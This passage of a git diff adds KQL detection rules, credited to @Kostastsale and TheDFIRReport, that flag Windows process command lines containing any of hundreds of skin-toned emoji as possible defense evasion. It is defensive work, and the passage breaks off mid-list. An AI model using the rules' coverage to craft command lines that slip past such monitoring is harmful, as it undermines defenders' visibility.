ProcessCommandLine contains "👩🏻‍🎓" or ProcessCommandLine contains "🧑🏻‍🎓" or ProcessCommandLine contains "👨🏻‍🎓" or ProcessCommandLine contains "👩🏻‍🎤" or ProcessCommandLine contains "🧑🏻‍🎤" or ProcessCommandLine contains "👨🏻‍🎤" or ProcessCommandLine contains "👩🏻‍🏫" or ProcessCommandLine contains "🧑🏻‍🏫" or ProcessCommandLine contains "👨🏻‍🏫" or ProcessCommandLine contains "👩🏻‍🏭" or ProcessCommandLine contains "🧑🏻‍🏭" or ProcessCommandLine contains 
"👨🏻‍🏭" or ProcessCommandLine contains "👩🏻‍💻" or ProcessCommandLine contains "🧑🏻‍💻" or ProcessCommandLine contains "👨🏻‍💻" or ProcessCommandLine contains "👩🏻‍💼" or ProcessCommandLine contains "🧑🏻‍💼" or ProcessCommandLine contains "👨🏻‍💼" or ProcessCommandLine contains "👩🏻‍🔧" or ProcessCommandLine contains "🧑🏻‍🔧" or ProcessCommandLine contains "👨🏻‍🔧" or ProcessCommandLine contains "👩🏻‍🔬" or ProcessCommandLine contains "🧑🏻‍🔬" or ProcessCommandLine contains "👨🏻‍🔬" or ProcessCommandLine contains "👩🏻‍🎨" or ProcessCommandLine contains "🧑🏻‍🎨" or ProcessCommandLine contains "👨🏻‍🎨" or ProcessCommandLine contains "👩🏻‍🚒" or ProcessCommandLine contains "🧑🏻‍🚒" or ProcessCommandLine contains "👨🏻‍🚒" or ProcessCommandLine contains "👩🏻‍✈️" or ProcessCommandLine contains "🧑🏻‍✈️" or ProcessCommandLine contains "👨🏻‍✈️" or ProcessCommandLine contains "👩🏻‍🚀" or ProcessCommandLine contains "🧑🏻‍🚀" or ProcessCommandLine contains "👨🏻‍🚀" or ProcessCommandLine contains "👩🏻‍⚖️" or ProcessCommandLine contains "🧑🏻‍⚖️" or ProcessCommandLine contains "👨🏻‍⚖️" or ProcessCommandLine contains "👰🏻‍♀️" or ProcessCommandLine contains "👰🏻" or ProcessCommandLine contains "👰🏻‍♂️" or ProcessCommandLine contains "🤵🏻‍♀️" or ProcessCommandLine contains "🤵🏻" or ProcessCommandLine contains "🤵🏻‍♂️" or ProcessCommandLine contains "👸🏻" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🤴🏻" or ProcessCommandLine contains "🥷🏻" or ProcessCommandLine contains "🦸🏻‍♀️" or ProcessCommandLine contains "🦸🏻" or ProcessCommandLine contains "🦸🏻‍♂️" or ProcessCommandLine contains "🦹🏻‍♀️" or ProcessCommandLine contains "🦹🏻" or ProcessCommandLine contains "🦹🏻‍♂️" or ProcessCommandLine contains "🤶🏻" or ProcessCommandLine contains "🧑🏻‍🎄" or ProcessCommandLine contains "🎅🏻" or ProcessCommandLine contains "🧙🏻‍♀️" or ProcessCommandLine contains "🧙🏻" or ProcessCommandLine contains "🧙🏻‍♂️" or ProcessCommandLine contains "🧝🏻‍♀️" or ProcessCommandLine contains "🧝🏻" or ProcessCommandLine contains "🧝🏻‍♂️" or ProcessCommandLine 
contains "🧛🏻‍♀️" or ProcessCommandLine contains "🧛🏻" or ProcessCommandLine contains "🧛🏻‍♂️" or ProcessCommandLine contains "🧜🏻‍♀️" or ProcessCommandLine contains "🧜🏻" or ProcessCommandLine contains "🧜🏻‍♂️" or ProcessCommandLine contains "🧚🏻‍♀️" or ProcessCommandLine contains "🧚🏻" or ProcessCommandLine contains "🧚🏻‍♂️" or ProcessCommandLine contains "👼🏻" or ProcessCommandLine contains "🤰🏻" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🤱🏻" or ProcessCommandLine contains "👩🏻‍🍼" or ProcessCommandLine contains "🧑🏻‍🍼" or ProcessCommandLine contains "👨🏻‍🍼" or ProcessCommandLine contains "🙇🏻‍♀️" or ProcessCommandLine contains "🙇🏻" or ProcessCommandLine contains "🙇🏻‍♂️" or ProcessCommandLine contains "💁🏻‍♀️" or ProcessCommandLine contains "💁🏻" or ProcessCommandLine contains "💁🏻‍♂️" or ProcessCommandLine contains "🙅🏻‍♀️" or ProcessCommandLine contains "🙅🏻" or ProcessCommandLine contains "🙅🏻‍♂️" or ProcessCommandLine contains "🙆🏻‍♀️" or ProcessCommandLine contains "🙆🏻" or ProcessCommandLine contains "🙆🏻‍♂️" or ProcessCommandLine contains "🙋🏻‍♀️" or ProcessCommandLine contains "🙋🏻" or ProcessCommandLine contains "🙋🏻‍♂️" or ProcessCommandLine contains "🧏🏻‍♀️" or ProcessCommandLine contains "🧏🏻" or ProcessCommandLine contains "🧏🏻‍♂️" or ProcessCommandLine contains "🤦🏻‍♀️" or ProcessCommandLine contains "🤦🏻" or ProcessCommandLine contains "🤦🏻‍♂️" or ProcessCommandLine contains "🤷🏻‍♀️" or ProcessCommandLine contains "🤷🏻" or ProcessCommandLine contains "🤷🏻‍♂️" or ProcessCommandLine contains "🙎🏻‍♀️" or ProcessCommandLine contains "🙎🏻" or ProcessCommandLine contains "🙎🏻‍♂️" or ProcessCommandLine contains "🙍🏻‍♀️" or ProcessCommandLine contains "🙍🏻" or ProcessCommandLine contains "🙍🏻‍♂️" or ProcessCommandLine contains "💇🏻‍♀️" or ProcessCommandLine contains "💇🏻" or ProcessCommandLine contains "💇🏻‍♂️" or ProcessCommandLine contains "💆🏻‍♀️" or ProcessCommandLine contains "💆🏻" or ProcessCommandLine contains "💆🏻‍♂️" or 
ProcessCommandLine contains "🧖🏻‍♀️" or ProcessCommandLine contains "🧖🏻" or ProcessCommandLine contains "🧖🏻‍♂️" or ProcessCommandLine contains "💃🏻" or ProcessCommandLine contains "🕺🏻" or ProcessCommandLine contains "🕴🏻" or ProcessCommandLine contains "👩🏻‍🦽" or ProcessCommandLine contains "🧑🏻‍🦽" or ProcessCommandLine contains "👨🏻‍🦽" or ProcessCommandLine contains "👩🏻‍🦼" or ProcessCommandLine contains "🧑🏻‍🦼" or ProcessCommandLine contains "👨🏻‍🦼" or ProcessCommandLine contains "🚶🏻‍♀️" or ProcessCommandLine contains "🚶🏻" or ProcessCommandLine contains "🚶🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦯" or ProcessCommandLine contains "🧑🏻‍🦯" or ProcessCommandLine contains "👨🏻‍🦯" or ProcessCommandLine contains "🧎🏻‍♀️" or ProcessCommandLine contains "🧎🏻" or ProcessCommandLine contains "🧎🏻‍♂️" or ProcessCommandLine contains "🏃🏻‍♀️" or ProcessCommandLine contains "🏃🏻" or ProcessCommandLine contains "🏃🏻‍♂️" or ProcessCommandLine contains "🧍🏻‍♀️" or ProcessCommandLine contains "🧍🏻" or ProcessCommandLine contains "🧍🏻‍♂️" or ProcessCommandLine contains "👭🏻" or ProcessCommandLine contains "🧑🏻‍🤝‍🧑🏻" or ProcessCommandLine contains "👬🏻" or ProcessCommandLine contains "👫🏻" or ProcessCommandLine contains "🧗🏻‍♀️" or ProcessCommandLine contains "🧗🏻" or ProcessCommandLine contains "🧗🏻‍♂️" or ProcessCommandLine contains "🏇🏻" or ProcessCommandLine contains "🏂🏻" or ProcessCommandLine contains "🏌🏻‍♀️" or ProcessCommandLine contains "🏌🏻" or ProcessCommandLine contains "🏌🏻‍♂️" or ProcessCommandLine contains "🏄🏻‍♀️" or ProcessCommandLine contains "🏄🏻" or ProcessCommandLine contains "🏄🏻‍♂️" or ProcessCommandLine contains "🚣🏻‍♀️" or ProcessCommandLine contains "🚣🏻" or ProcessCommandLine contains "🚣🏻‍♂️" or ProcessCommandLine contains "🏊🏻‍♀️" or ProcessCommandLine contains "🏊🏻" or ProcessCommandLine contains "🏊🏻‍♂️" or ProcessCommandLine contains "⛹🏻‍♀️" or ProcessCommandLine contains "⛹🏻" or ProcessCommandLine contains "⛹🏻‍♂️" or ProcessCommandLine contains "🏋🏻‍♀️" or ProcessCommandLine contains "🏋🏻" or 
ProcessCommandLine contains "🏋🏻‍♂️" or ProcessCommandLine contains "🚴🏻‍♀️" or ProcessCommandLine contains "🚴🏻" or ProcessCommandLine contains "🚴🏻‍♂️" or ProcessCommandLine contains "🚵🏻‍♀️" or ProcessCommandLine contains "🚵🏻" or ProcessCommandLine contains "🚵🏻‍♂️" or ProcessCommandLine contains "🤸🏻‍♀️" or ProcessCommandLine contains "🤸🏻" or ProcessCommandLine contains "🤸🏻‍♂️" or ProcessCommandLine contains "🤽🏻‍♀️" or ProcessCommandLine contains "🤽🏻" or ProcessCommandLine contains "🤽🏻‍♂️" or ProcessCommandLine contains "🤾🏻‍♀️" or ProcessCommandLine contains "🤾🏻" or ProcessCommandLine contains "🤾🏻‍♂️" or ProcessCommandLine contains "🤹🏻‍♀️" or ProcessCommandLine contains "🤹🏻" or ProcessCommandLine contains "🤹🏻‍♂️" or ProcessCommandLine contains "🧘🏻‍♀️" or ProcessCommandLine contains "🧘🏻" or ProcessCommandLine contains "🧘🏻‍♂️" or ProcessCommandLine contains "🛀🏻" or ProcessCommandLine contains "🛌🏻" or ProcessCommandLine contains "👋🏼" or ProcessCommandLine contains "🤚🏼" or ProcessCommandLine contains "🖐🏼" or ProcessCommandLine contains "✋🏼" or ProcessCommandLine contains "🖖🏼" or ProcessCommandLine contains "👌🏼" or ProcessCommandLine contains "🤌🏼" or ProcessCommandLine contains "🤏🏼" or ProcessCommandLine contains "✌🏼" or ProcessCommandLine contains "🤞🏼" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🤟🏼" or ProcessCommandLine contains "🤘🏼" or ProcessCommandLine contains "🤙🏼" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "👈🏼" or ProcessCommandLine contains "👉🏼" or ProcessCommandLine contains "👆🏼" or ProcessCommandLine contains "🖕🏼" or ProcessCommandLine contains "👇🏼" or ProcessCommandLine contains "☝🏼" or ProcessCommandLine contains "👍🏼" or ProcessCommandLine contains "👎🏼" or ProcessCommandLine contains "✊🏼" or ProcessCommandLine contains "👊🏼" or ProcessCommandLine contains "🤛🏼" or 
ProcessCommandLine contains "🤜🏼" or ProcessCommandLine contains "👏🏼" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🙌🏼" or ProcessCommandLine contains "👐🏼" or ProcessCommandLine contains "🤲🏼" or ProcessCommandLine contains "🙏🏼" or ProcessCommandLine contains "✍🏼" or ProcessCommandLine contains "💪🏼" or ProcessCommandLine contains "🦵🏼" or ProcessCommandLine contains "🦶🏼" or ProcessCommandLine contains "👂🏼" or ProcessCommandLine contains "🦻🏼" or ProcessCommandLine contains "👃🏼" or ProcessCommandLine contains "👶🏼" or ProcessCommandLine contains "👧🏼" or ProcessCommandLine contains "🧒🏼" or ProcessCommandLine contains "👦🏼" or ProcessCommandLine contains "👩🏼" or ProcessCommandLine contains "🧑🏼" or ProcessCommandLine contains "👨🏼" or ProcessCommandLine contains "👩🏼‍🦱" or ProcessCommandLine contains "🧑🏼‍🦱" or ProcessCommandLine contains "👨🏼‍🦱" or ProcessCommandLine contains "👩🏼‍🦰" or ProcessCommandLine contains "🧑🏼‍🦰" or ProcessCommandLine contains "👨🏼‍🦰" or ProcessCommandLine contains "👱🏼‍♀️" or ProcessCommandLine contains "👱🏼" or ProcessCommandLine contains "👱🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦳" or ProcessCommandLine contains "🧑🏼‍🦳" or ProcessCommandLine contains "👨🏼‍🦳" or ProcessCommandLine contains "👩🏼‍🦲" or ProcessCommandLine contains "🧑🏼‍🦲" or ProcessCommandLine contains "👨🏼‍🦲" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏼" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "👵🏼" or ProcessCommandLine contains "🧓🏼" or ProcessCommandLine contains "👴🏼" or ProcessCommandLine contains "👲🏼" or ProcessCommandLine contains "👳🏼‍♀️" or ProcessCommandLine contains "👳🏼" or ProcessCommandLine contains "👳🏼‍♂️" or ProcessCommandLine contains "🧕🏼" or ProcessCommandLine contains "👮🏼‍♀️" or ProcessCommandLine contains "👮🏼" or ProcessCommandLine contains "👮🏼‍♂️" or ProcessCommandLine contains "👷🏼‍♀️" or ProcessCommandLine contains "👷🏼" or ProcessCommandLine contains "👷🏼‍♂️" or ProcessCommandLine contains "💂🏼‍♀️" 
or ProcessCommandLine contains "💂🏼" or ProcessCommandLine contains "💂🏼‍♂️" or ProcessCommandLine contains "🕵🏼‍♀️" or ProcessCommandLine contains "🕵🏼" or ProcessCommandLine contains "🕵🏼‍♂️" or ProcessCommandLine contains "👩🏼‍⚕️" or ProcessCommandLine contains "🧑🏼‍⚕️" or ProcessCommandLine contains "👨🏼‍⚕️" or ProcessCommandLine contains "👩🏼‍🌾" or ProcessCommandLine contains "🧑🏼‍🌾" or ProcessCommandLine contains "👨🏼‍🌾" or ProcessCommandLine contains "👩🏼‍🍳" or ProcessCommandLine contains "🧑🏼‍🍳" or ProcessCommandLine contains "👨🏼‍🍳" or ProcessCommandLine contains "👩🏼‍🎓" or ProcessCommandLine contains "🧑🏼‍🎓" or ProcessCommandLine contains "👨🏼‍🎓" or ProcessCommandLine contains "👩🏼‍🎤" or ProcessCommandLine contains "🧑🏼‍🎤" or ProcessCommandLine contains "👨🏼‍🎤" or ProcessCommandLine contains "👩🏼‍🏫" or ProcessCommandLine contains "🧑🏼‍🏫" or ProcessCommandLine contains "👨🏼‍🏫" or ProcessCommandLine contains "👩🏼‍🏭" or ProcessCommandLine contains "🧑🏼‍🏭" or ProcessCommandLine contains "👨🏼‍🏭" or ProcessCommandLine contains "👩🏼‍💻" or ProcessCommandLine contains "🧑🏼‍💻" or ProcessCommandLine contains "👨🏼‍💻" or ProcessCommandLine contains "👩🏼‍💼" or ProcessCommandLine contains "🧑🏼‍💼" or ProcessCommandLine contains "👨🏼‍💼" or ProcessCommandLine contains "👩🏼‍🔧" or ProcessCommandLine contains "🧑🏼‍🔧" or ProcessCommandLine contains "👨🏼‍🔧" or ProcessCommandLine contains "👩🏼‍🔬" or ProcessCommandLine contains "🧑🏼‍🔬" or ProcessCommandLine contains "👨🏼‍🔬" or ProcessCommandLine contains "👩🏼‍🎨" or ProcessCommandLine contains "🧑🏼‍🎨" or ProcessCommandLine contains "👨🏼‍🎨" or ProcessCommandLine contains "👩🏼‍🚒" or ProcessCommandLine contains "🧑🏼‍🚒" or ProcessCommandLine contains "👨🏼‍🚒" or ProcessCommandLine contains "👩🏼‍✈️" or ProcessCommandLine contains "🧑🏼‍✈️" or ProcessCommandLine contains "👨🏼‍✈️" or ProcessCommandLine contains "👩🏼‍🚀" or ProcessCommandLine contains "🧑🏼‍🚀" or ProcessCommandLine contains "👨🏼‍🚀" or ProcessCommandLine contains "👩🏼‍⚖️" or ProcessCommandLine contains "🧑🏼‍⚖️" or 
ProcessCommandLine contains "👨🏼‍⚖️" or ProcessCommandLine contains "👰🏼‍♀️" or ProcessCommandLine contains "👰🏼" or ProcessCommandLine contains "👰🏼‍♂️" or ProcessCommandLine contains "🤵🏼‍♀️" or ProcessCommandLine contains "🤵🏼" or ProcessCommandLine contains "🤵🏼‍♂️" or ProcessCommandLine contains "👸🏼" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🤴🏼" or ProcessCommandLine contains "🥷🏼" or ProcessCommandLine contains "🦸🏼‍♀️" or ProcessCommandLine contains "🦸🏼" or ProcessCommandLine contains "🦸🏼‍♂️" or ProcessCommandLine contains "🦹🏼‍♀️" or ProcessCommandLine contains "🦹🏼" or ProcessCommandLine contains "🦹🏼‍♂️" or ProcessCommandLine contains "🤶🏼" or ProcessCommandLine contains "🧑🏼‍🎄" or ProcessCommandLine contains "🎅🏼" or ProcessCommandLine contains "🧙🏼‍♀️" or ProcessCommandLine contains "🧙🏼" or ProcessCommandLine contains "🧙🏼‍♂️" or ProcessCommandLine contains "🧝🏼‍♀️" or ProcessCommandLine contains "🧝🏼" or ProcessCommandLine contains "🧝🏼‍♂️" or ProcessCommandLine contains "🧛🏼‍♀️" or ProcessCommandLine contains "🧛🏼" or ProcessCommandLine contains "🧛🏼‍♂️" or ProcessCommandLine contains "🧜🏼‍♀️" or ProcessCommandLine contains "🧜🏼" or ProcessCommandLine contains "🧜🏼‍♂️" or ProcessCommandLine contains "🧚🏼‍♀️" or ProcessCommandLine contains "🧚🏼" or ProcessCommandLine contains "🧚🏼‍♂️" or ProcessCommandLine contains "👼🏼" or ProcessCommandLine contains "🤰🏼" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🤱🏼" or ProcessCommandLine contains "👩🏼‍🍼" or ProcessCommandLine contains "🧑🏼‍🍼" or ProcessCommandLine contains "👨🏼‍🍼" or ProcessCommandLine contains "🙇🏼‍♀️" or ProcessCommandLine contains "🙇🏼" or ProcessCommandLine contains "🙇🏼‍♂️" or ProcessCommandLine contains "💁🏼‍♀️" or ProcessCommandLine contains "💁🏼" or ProcessCommandLine contains "💁🏼‍♂️" or ProcessCommandLine contains "🙅🏼‍♀️" or ProcessCommandLine contains "🙅🏼" or ProcessCommandLine contains "🙅🏼‍♂️" or ProcessCommandLine contains "🙆🏼‍♀️" or 
ProcessCommandLine contains "🙆🏼" or ProcessCommandLine contains "🙆🏼‍♂️" or ProcessCommandLine contains "🙋🏼‍♀️" or ProcessCommandLine contains "🙋🏼" or ProcessCommandLine contains "🙋🏼‍♂️" or ProcessCommandLine contains "🧏🏼‍♀️" or ProcessCommandLine contains "🧏🏼" or ProcessCommandLine contains "🧏🏼‍♂️" or ProcessCommandLine contains "🤦🏼‍♀️" or ProcessCommandLine contains "🤦🏼" or ProcessCommandLine contains "🤦🏼‍♂️" or ProcessCommandLine contains "🤷🏼‍♀️"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
new file mode 100644
index 00000000..3870877d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
@@ -0,0 +1,10 @@
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "🤷🏼" or ProcessCommandLine contains "🤷🏼‍♂️" or ProcessCommandLine contains "🙎🏼‍♀️" or ProcessCommandLine contains "🙎🏼" or ProcessCommandLine contains "🙎🏼‍♂️" or ProcessCommandLine contains "🙍🏼‍♀️" or ProcessCommandLine contains "🙍🏼" or ProcessCommandLine contains "🙍🏼‍♂️" or ProcessCommandLine contains "💇🏼‍♀️" or ProcessCommandLine contains "💇🏼" or ProcessCommandLine contains "💇🏼‍♂️" or ProcessCommandLine contains "💆🏼‍♀️" or ProcessCommandLine contains "💆🏼" or ProcessCommandLine contains "💆🏼‍♂️" or ProcessCommandLine contains "🧖🏼‍♀️" or ProcessCommandLine contains "🧖🏼" or ProcessCommandLine contains "🧖🏼‍♂️" or ProcessCommandLine contains "💃🏼" or ProcessCommandLine contains "🕺🏼" or ProcessCommandLine contains "🕴🏼" or ProcessCommandLine contains "👩🏼‍🦽" or ProcessCommandLine contains "🧑🏼‍🦽" or ProcessCommandLine contains "👨🏼‍🦽" or ProcessCommandLine contains "👩🏼‍🦼" or ProcessCommandLine contains "🧑🏼‍🦼" or ProcessCommandLine contains "👨🏼‍🦼" or ProcessCommandLine contains "🚶🏼‍♀️" or ProcessCommandLine contains "🚶🏼" or ProcessCommandLine contains "🚶🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦯" or ProcessCommandLine contains "🧑🏼‍🦯" or ProcessCommandLine contains "👨🏼‍🦯" or ProcessCommandLine contains "🧎🏼‍♀️" or ProcessCommandLine contains "🧎🏼" or ProcessCommandLine contains "🧎🏼‍♂️" or ProcessCommandLine contains "🏃🏼‍♀️" or ProcessCommandLine contains "🏃🏼" or ProcessCommandLine contains "🏃🏼‍♂️" or ProcessCommandLine contains "🧍🏼‍♀️" or ProcessCommandLine contains "🧍🏼" or ProcessCommandLine contains "🧍🏼‍♂️" or ProcessCommandLine contains "👭🏼" or 
ProcessCommandLine contains "🧑🏼‍🤝‍🧑🏼" or ProcessCommandLine contains "👬🏼" or ProcessCommandLine contains "👫🏼" or ProcessCommandLine contains "🧗🏼‍♀️" or ProcessCommandLine contains "🧗🏼" or ProcessCommandLine contains "🧗🏼‍♂️" or ProcessCommandLine contains "🏇🏼" or ProcessCommandLine contains "🏂🏼" or ProcessCommandLine contains "🏌🏼‍♀️" or ProcessCommandLine contains "🏌🏼" or ProcessCommandLine contains "🏌🏼‍♂️" or ProcessCommandLine contains "🏄🏼‍♀️" or ProcessCommandLine contains "🏄🏼" or ProcessCommandLine contains "🏄🏼‍♂️" or ProcessCommandLine contains "🚣🏼‍♀️" or ProcessCommandLine contains "🚣🏼" or ProcessCommandLine contains "🚣🏼‍♂️" or ProcessCommandLine contains "🏊🏼‍♀️" or ProcessCommandLine contains "🏊🏼" or ProcessCommandLine contains "🏊🏼‍♂️" or ProcessCommandLine contains "⛹🏼‍♀️" or ProcessCommandLine contains "⛹🏼" or ProcessCommandLine contains "⛹🏼‍♂️" or ProcessCommandLine contains "🏋🏼‍♀️" or ProcessCommandLine contains "🏋🏼" or ProcessCommandLine contains "🏋🏼‍♂️" or ProcessCommandLine contains "🚴🏼‍♀️" or ProcessCommandLine contains "🚴🏼" or ProcessCommandLine contains "🚴🏼‍♂️" or ProcessCommandLine contains "🚵🏼‍♀️" or ProcessCommandLine contains "🚵🏼" or ProcessCommandLine contains "🚵🏼‍♂️" or ProcessCommandLine contains "🤸🏼‍♀️" or ProcessCommandLine contains "🤸🏼" or ProcessCommandLine contains "🤸🏼‍♂️" or ProcessCommandLine contains "🤽🏼‍♀️" or ProcessCommandLine contains "🤽🏼" or ProcessCommandLine contains "🤽🏼‍♂️" or ProcessCommandLine contains "🤾🏼‍♀️" or ProcessCommandLine contains "🤾🏼" or ProcessCommandLine contains "🤾🏼‍♂️" or ProcessCommandLine contains "🤹🏼‍♀️" or ProcessCommandLine contains "🤹🏼" or ProcessCommandLine contains "🤹🏼‍♂️" or ProcessCommandLine contains "🧘🏼‍♀️" or ProcessCommandLine contains "🧘🏼" or ProcessCommandLine contains "🧘🏼‍♂️" or ProcessCommandLine contains "🛀🏼" or ProcessCommandLine contains "🛌🏼" or ProcessCommandLine contains "👋🏽" or ProcessCommandLine contains "🤚🏽" or ProcessCommandLine contains "🖐🏽" or ProcessCommandLine contains "✋🏽" or 
ProcessCommandLine contains "🖖🏽" or ProcessCommandLine contains "👌🏽" or ProcessCommandLine contains "🤌🏽" or ProcessCommandLine contains "🤏🏽" or ProcessCommandLine contains "✌🏽" or ProcessCommandLine contains "🤞🏽" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🤟🏽" or ProcessCommandLine contains "🤘🏽" or ProcessCommandLine contains "🤙🏽" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "👈🏽" or ProcessCommandLine contains "👉🏽" or ProcessCommandLine contains "👆🏽" or ProcessCommandLine contains "🖕🏽" or ProcessCommandLine contains "👇🏽" or ProcessCommandLine contains "☝🏽" or ProcessCommandLine contains "👍🏽" or ProcessCommandLine contains "👎🏽" or ProcessCommandLine contains "✊🏽" or ProcessCommandLine contains "👊🏽" or ProcessCommandLine contains "🤛🏽" or ProcessCommandLine contains "🤜🏽" or ProcessCommandLine contains "👏🏽" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🙌🏽" or ProcessCommandLine contains "👐🏽" or ProcessCommandLine contains "🤲🏽" or ProcessCommandLine contains "🙏🏽" or ProcessCommandLine contains "✍🏽" or ProcessCommandLine contains "💪🏽" or ProcessCommandLine contains "🦵🏽" or ProcessCommandLine contains "🦶🏽" or ProcessCommandLine contains "👂🏽" or ProcessCommandLine contains "🦻🏽" or ProcessCommandLine contains "👃🏽" or ProcessCommandLine contains "👶🏽" or ProcessCommandLine contains "👧🏽" or ProcessCommandLine contains "🧒🏽" or ProcessCommandLine contains "👦🏽" or ProcessCommandLine contains "👩🏽" or ProcessCommandLine contains "🧑🏽" or ProcessCommandLine contains "👨🏽" or ProcessCommandLine contains "👩🏽‍🦱" or ProcessCommandLine contains "🧑🏽‍🦱" or ProcessCommandLine contains "👨🏽‍🦱" or ProcessCommandLine contains "👩🏽‍🦰" or ProcessCommandLine contains "🧑🏽‍🦰" or ProcessCommandLine contains "👨🏽‍🦰" or ProcessCommandLine contains "👱🏽‍♀️" or ProcessCommandLine contains "👱🏽" or 
ProcessCommandLine contains "👱🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦳" or ProcessCommandLine contains "🧑🏽‍🦳" or ProcessCommandLine contains "👨🏽‍🦳" or ProcessCommandLine contains "👩🏽‍🦲" or ProcessCommandLine contains "🧑🏽‍🦲" or ProcessCommandLine contains "👨🏽‍🦲" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏽" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "👵🏽" or ProcessCommandLine contains "🧓🏽" or ProcessCommandLine contains "👴🏽" or ProcessCommandLine contains "👲🏽" or ProcessCommandLine contains "👳🏽‍♀️" or ProcessCommandLine contains "👳🏽" or ProcessCommandLine contains "👳🏽‍♂️" or ProcessCommandLine contains "🧕🏽" or ProcessCommandLine contains "👮🏽‍♀️" or ProcessCommandLine contains "👮🏽" or ProcessCommandLine contains "👮🏽‍♂️" or ProcessCommandLine contains "👷🏽‍♀️" or ProcessCommandLine contains "👷🏽" or ProcessCommandLine contains "👷🏽‍♂️" or ProcessCommandLine contains "💂🏽‍♀️" or ProcessCommandLine contains "💂🏽" or ProcessCommandLine contains "💂🏽‍♂️" or ProcessCommandLine contains "🕵🏽‍♀️" or ProcessCommandLine contains "🕵🏽" or ProcessCommandLine contains "🕵🏽‍♂️" or ProcessCommandLine contains "👩🏽‍⚕️" or ProcessCommandLine contains "🧑🏽‍⚕️" or ProcessCommandLine contains "👨🏽‍⚕️" or ProcessCommandLine contains "👩🏽‍🌾" or ProcessCommandLine contains "🧑🏽‍🌾" or ProcessCommandLine contains "👨🏽‍🌾" or ProcessCommandLine contains "👩🏽‍🍳" or ProcessCommandLine contains "🧑🏽‍🍳" or ProcessCommandLine contains "👨🏽‍🍳" or ProcessCommandLine contains "👩🏽‍🎓" or ProcessCommandLine contains "🧑🏽‍🎓" or ProcessCommandLine contains "👨🏽‍🎓" or ProcessCommandLine contains "👩🏽‍🎤" or ProcessCommandLine contains "🧑🏽‍🎤" or ProcessCommandLine contains "👨🏽‍🎤" or ProcessCommandLine contains "👩🏽‍🏫" or ProcessCommandLine contains "🧑🏽‍🏫" or ProcessCommandLine contains "👨🏽‍🏫" or ProcessCommandLine contains "👩🏽‍🏭" or ProcessCommandLine contains "🧑🏽‍🏭" or ProcessCommandLine contains "👨🏽‍🏭" or ProcessCommandLine contains "👩🏽‍💻" or ProcessCommandLine contains 
"🧑🏽‍💻" or ProcessCommandLine contains "👨🏽‍💻" or ProcessCommandLine contains "👩🏽‍💼" or ProcessCommandLine contains "🧑🏽‍💼" or ProcessCommandLine contains "👨🏽‍💼" or ProcessCommandLine contains "👩🏽‍🔧" or ProcessCommandLine contains "🧑🏽‍🔧" or ProcessCommandLine contains "👨🏽‍🔧" or ProcessCommandLine contains "👩🏽‍🔬" or ProcessCommandLine contains "🧑🏽‍🔬" or ProcessCommandLine contains "👨🏽‍🔬" or ProcessCommandLine contains "👩🏽‍🎨" or ProcessCommandLine contains "🧑🏽‍🎨" or ProcessCommandLine contains "👨🏽‍🎨" or ProcessCommandLine contains "👩🏽‍🚒" or ProcessCommandLine contains "🧑🏽‍🚒" or ProcessCommandLine contains "👨🏽‍🚒" or ProcessCommandLine contains "👩🏽‍✈️" or ProcessCommandLine contains "🧑🏽‍✈️" or ProcessCommandLine contains "👨🏽‍✈️" or ProcessCommandLine contains "👩🏽‍🚀" or ProcessCommandLine contains "🧑🏽‍🚀" or ProcessCommandLine contains "👨🏽‍🚀" or ProcessCommandLine contains "👩🏽‍⚖️" or ProcessCommandLine contains "🧑🏽‍⚖️" or ProcessCommandLine contains "👨🏽‍⚖️" or ProcessCommandLine contains "👰🏽‍♀️" or ProcessCommandLine contains "👰🏽" or ProcessCommandLine contains "👰🏽‍♂️" or ProcessCommandLine contains "🤵🏽‍♀️" or ProcessCommandLine contains "🤵🏽" or ProcessCommandLine contains "🤵🏽‍♂️" or ProcessCommandLine contains "👸🏽" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🤴🏽" or ProcessCommandLine contains "🥷🏽" or ProcessCommandLine contains "🦸🏽‍♀️" or ProcessCommandLine contains "🦸🏽" or ProcessCommandLine contains "🦸🏽‍♂️" or ProcessCommandLine contains "🦹🏽‍♀️" or ProcessCommandLine contains "🦹🏽" or ProcessCommandLine contains "🦹🏽‍♂️" or ProcessCommandLine contains "🤶🏽" or ProcessCommandLine contains "🧑🏽‍🎄" or ProcessCommandLine contains "🎅🏽" or ProcessCommandLine contains "🧙🏽‍♀️" or ProcessCommandLine contains "🧙🏽" or ProcessCommandLine contains "🧙🏽‍♂️" or 